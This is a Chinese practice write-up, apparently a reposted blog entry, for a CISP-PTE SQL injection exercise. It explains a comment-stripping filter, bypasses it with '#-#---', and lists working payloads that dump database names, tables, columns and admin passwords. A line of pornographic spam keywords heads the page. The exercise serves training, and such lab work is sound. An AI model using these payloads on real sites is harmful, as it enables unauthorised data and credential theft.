国产 无码 综合区,色欲AV无码国产永久播放,无码天堂亚洲国产AV,国产日韩欧美女同一区二区

CISP-PTE練習(xí)篇(基礎(chǔ)題目一:SQL注入)

這篇具有很好參考價值的文章主要介紹了CISP-PTE練習(xí)篇(基礎(chǔ)題目一:SQL注入)。希望對大家有所幫助。如果存在錯誤或未考慮完全的地方,請大家不吝賜教,您也可以點擊"舉報違法"按鈕提交疑問。

本文僅當(dāng)作練習(xí)記錄使用。

開始答題:

CISP-PTE練習(xí)篇(基礎(chǔ)題目一:SQL注入),web安全

注冊賬號 poi ,在發(fā)表出給出過濾代碼如下;

// 代碼過濾規(guī)則
while (strstr($sql,'--')) {
	$sql = str_replace("--", "", $sql);
}
while (strstr($sql,'#')) {
	$sql = str_replace("#", "", $sql);
}

函數(shù)的作用:

strstr(str1,str2)
函數(shù)用于判斷字符串str2是否是str1的子串。如果是,則該函數(shù)返回 str1字符串從 str2第一次出現(xiàn)的位置開始到 str1結(jié)尾的字符串;否則,返回NULL。

舉例:

<?php
echo strstr("123456","5");

?>
意思就是只返回 "123456" 中出現(xiàn)的第一個 "5" 直到結(jié)束(顯示結(jié)果結(jié)果為 56)

str_replace("--", "", $sql);
意思是將--$sql中的全部替換為 空
str_replace()函數(shù)
str_replace(find,replace,string);

find?????? 必需。規(guī)定要查找的值。
replace 必需。規(guī)定替換 find 中的值的值。
string??? 必需。規(guī)定被搜索的字符串。
<?php
echo str_replace("1","2","11111");
?>
意思就是將111111中的1全部替換為2(顯示結(jié)果為22222)

知道函數(shù)的作用之后嘗試進行繞過,可利用在線運行PHP攻擊進行嘗試?yán)@過。

系統(tǒng)沒有過濾空格等特殊符號

CISP-PTE練習(xí)篇(基礎(chǔ)題目一:SQL注入),web安全

獲取當(dāng)前數(shù)據(jù)庫:

database',(select database()),'poi') #-#---

CISP-PTE練習(xí)篇(基礎(chǔ)題目一:SQL注入),web安全

?獲取2web數(shù)據(jù)庫中的所有表:

22',(select group_concat(table_name) from information_schema.tables where table_schema='2web'),'poi')#-#---

CISP-PTE練習(xí)篇(基礎(chǔ)題目一:SQL注入),web安全

?獲取表中的字段:

column_name',(select group_concat(column_name) from information_schema.columns where? table_name='users1'),'poi')#-#---

CISP-PTE練習(xí)篇(基礎(chǔ)題目一:SQL注入),web安全

?獲取字段 password,username 中的值:

22',(select group_concat(username,'_',password) from users1),'poi')#-#---

想直接獲取所有的 password,username 的值但是沒有成功---可能由于查詢長度過長做了限制。

知道了表明為users1,字段名為password,username;直接select * from 進行查詢。

22',(select password from users1 where username='admin'),'poi')#-#---

CISP-PTE練習(xí)篇(基礎(chǔ)題目一:SQL注入),web安全

知識點補充:

information_schema 庫存儲了其他數(shù)據(jù)庫中的所有信息
tables表????????? 保存了所有的數(shù)據(jù)庫的名稱和數(shù)據(jù)庫表的名稱等
schemata表??? 保存了所有的數(shù)據(jù)庫的名稱和數(shù)據(jù)庫的編碼信息等
columns表????? 保存了mysql數(shù)據(jù)庫中所有表的信息如:數(shù)據(jù)庫名稱、字段名稱、字段類型等
schema_name??? 庫名信息
table_name???????? 表名信息
column_name???? 字段信息

group_concat() ?? 拼接顯示?文章來源地址http://www.zghlxwxcb.cn/news/detail-666568.html

到了這里,關(guān)于CISP-PTE練習(xí)篇(基礎(chǔ)題目一:SQL注入)的文章就介紹完了。如果您還想了解更多內(nèi)容,請在右上角搜索TOY模板網(wǎng)以前的文章或繼續(xù)瀏覽下面的相關(guān)文章,希望大家以后多多支持TOY模板網(wǎng)!

本文來自互聯(lián)網(wǎng)用戶投稿,該文觀點僅代表作者本人,不代表本站立場。本站僅提供信息存儲空間服務(wù),不擁有所有權(quán),不承擔(dān)相關(guān)法律責(zé)任。如若轉(zhuǎn)載,請注明出處: 如若內(nèi)容造成侵權(quán)/違法違規(guī)/事實不符,請點擊違法舉報進行投訴反饋,一經(jīng)查實,立即刪除!

領(lǐng)支付寶紅包贊助服務(wù)器費用

相關(guān)文章

  • 【W(wǎng)EB安全】SQL注入挖掘

    【W(wǎng)EB安全】SQL注入挖掘

    2021年OWASP發(fā)布漏洞威脅榜單,SQL注入從第一名下降到第三(https://owasp.org/Top10/),SQL注入是一種常見的Web攻擊技術(shù),通過構(gòu)造惡意的SQL語句來破壞數(shù)據(jù)庫安全。攻擊者可以通過提交帶有惡意代碼的輸入,例如網(wǎng)頁表單,來控制數(shù)據(jù)庫執(zhí)行惡意語句。這樣,攻擊者可以訪問敏感

    2024年02月13日
    瀏覽(30)
  • Web安全-初識SQL注入(一)

    Web安全-初識SQL注入(一)

    將不受信任的數(shù)據(jù)作為命令或查詢的一部分發(fā)送到解析器時,會產(chǎn)生諸如SQL注入、NoSQL注入、OS 注入和LDAP注入的注入缺陷。攻擊者的惡意數(shù)據(jù)可以誘使解析器在沒有適當(dāng)授權(quán)的情況下執(zhí)行非預(yù)期命令或訪問數(shù)據(jù)。 注入能導(dǎo)致數(shù)據(jù)丟失、 破壞或泄露給無授權(quán)方,缺乏可審計性

    2024年02月05日
    瀏覽(19)
  • Web安全:SQL注入漏洞測試.

    Web安全:SQL注入漏洞測試.

    SQL注入就是 有些 惡意用戶在提交查詢請求的過程中 將SQL語句插入到請求內(nèi)容 中,同時程序的本身對用戶輸入的內(nèi)容過于相信, 沒有對用戶插入的SQL語句進行任何的過濾 ,從而 直接被SQL語句直接被服務(wù)端執(zhí)行 ,導(dǎo)致數(shù)據(jù)庫的原有信息泄露,篡改,甚至被刪除等風(fēng)險。 SQL注

    2024年02月05日
    瀏覽(25)
  • Web安全-SQL注入常用函數(shù)(二)

    Web安全-SQL注入常用函數(shù)(二)

    ★★實戰(zhàn)前置聲明★★ 文章中涉及的程序(方法)可能帶有攻擊性,僅供安全研究與學(xué)習(xí)之用,讀者將其信息做其他用途,由用戶承擔(dān)全部法律及連帶責(zé)任,文章作者不承擔(dān)任何法律及連帶責(zé)任。 初始化安裝MySQL數(shù)據(jù)庫后(基于MySQL版本5.7.x),默認會創(chuàng)建4個系統(tǒng)數(shù)據(jù)庫: 以下內(nèi)

    2024年01月19日
    瀏覽(25)
  • Web安全之SQL注入繞過技巧

    Web安全之SQL注入繞過技巧

    兩個空格代替一個空格,用Tab代替空格,%a0=空格: ??最基本的繞過方法,用注釋替換空格: 使用浮點數(shù): 如果空格被過濾,括號沒有被過濾,可以用括號繞過。 在MySQL中,括號是用來包圍子查詢的。因此,任何可以計算出結(jié)果的語句,都可以用括號包圍起來。而括號的兩

    2024年02月07日
    瀏覽(26)
  • web安全漏洞-SQL注入攻擊實驗

    web安全漏洞-SQL注入攻擊實驗

    實驗?zāi)康?學(xué)習(xí)sql顯注的漏洞判斷原理 掌握sqlmap工具的使用 分析SQL注入漏洞的成因 實驗工具 sqlmap是用python寫的開源的測試框架,支持MySQL,Oracle,PostgreSQL,Microsoft SQL Server,Microsoft Access,IBM DB2,SQLite,F(xiàn)irebird,Sybase,SAP,MAXDB并支持6種SQL注入手段。 實驗內(nèi)容 SQL注入(SQL I

    2024年02月06日
    瀏覽(28)
  • 加強Web應(yīng)用程序安全:防止SQL注入

    加強Web應(yīng)用程序安全:防止SQL注入

    數(shù)據(jù)庫在Web應(yīng)用程序中存儲和組織數(shù)據(jù)時起著至關(guān)重要的作用,它是存儲用戶信息、內(nèi)容和其他應(yīng)用程序數(shù)據(jù)的中央存儲庫。而數(shù)據(jù)庫實現(xiàn)了高效的數(shù)據(jù)檢索、操作和管理,使Web應(yīng)用程序能夠向用戶提供動態(tài)和個性化的內(nèi)容。然而,數(shù)據(jù)庫和網(wǎng)絡(luò)應(yīng)用程序之間的通信不暢可能

    2024年02月14日
    瀏覽(24)
  • Web安全:SQL注入漏洞測試(防止 黑客利用此漏洞.)

    Web安全:SQL注入漏洞測試(防止 黑客利用此漏洞.)

    SQL注入就是 有些 惡意用戶在提交查詢請求的過程中 將SQL語句插入到請求內(nèi)容 中,同時程序的本身對用戶輸入的內(nèi)容過于相信, 沒有對用戶插入的SQL語句進行任何的過濾 ,從而 直接被SQL語句直接被服務(wù)端執(zhí)行 ,導(dǎo)致數(shù)據(jù)庫的原有信息泄露,篡改,甚至被刪除等風(fēng)險。 SQL注

    2024年02月13日
    瀏覽(22)
  • Web安全 SQL注入漏洞測試.(可以 防止惡意用戶利用漏洞)

    Web安全 SQL注入漏洞測試.(可以 防止惡意用戶利用漏洞)

    SQL注入就是 有些 惡意用戶在提交查詢請求的過程中 將SQL語句插入到請求內(nèi)容 中,同時程序的本身對用戶輸入的內(nèi)容過于相信, 沒有對用戶插入的SQL語句進行任何的過濾 ,從而 直接被SQL語句直接被服務(wù)端執(zhí)行 ,導(dǎo)致數(shù)據(jù)庫的原有信息泄露,篡改,甚至被刪除等風(fēng)險。 SQL注

    2023年04月20日
    瀏覽(25)
  • 常見web安全漏洞-暴力破解,xss,SQL注入,csrf

    常見web安全漏洞-暴力破解,xss,SQL注入,csrf

    1,暴力破解 原理: ? ? ? ? 使用大量的認證信息在認證接口進行登錄認證,知道正確為止。為提高效率一般使用帶有字典的工具自動化操作 ? ? ? ? 基于表單的暴力破解 --- 若用戶沒有安全認證,直接進行抓包破解。 驗證碼繞過 ? ????????????????????????on s

    2023年04月12日
    瀏覽(23)

覺得文章有用就打賞一下文章作者

支付寶掃一掃打賞

博客贊助

微信掃一掃打賞

請作者喝杯咖啡吧~博客贊助

支付寶掃一掃領(lǐng)取紅包,優(yōu)惠每天領(lǐng)

二維碼1

領(lǐng)取紅包

二維碼2

領(lǐng)紅包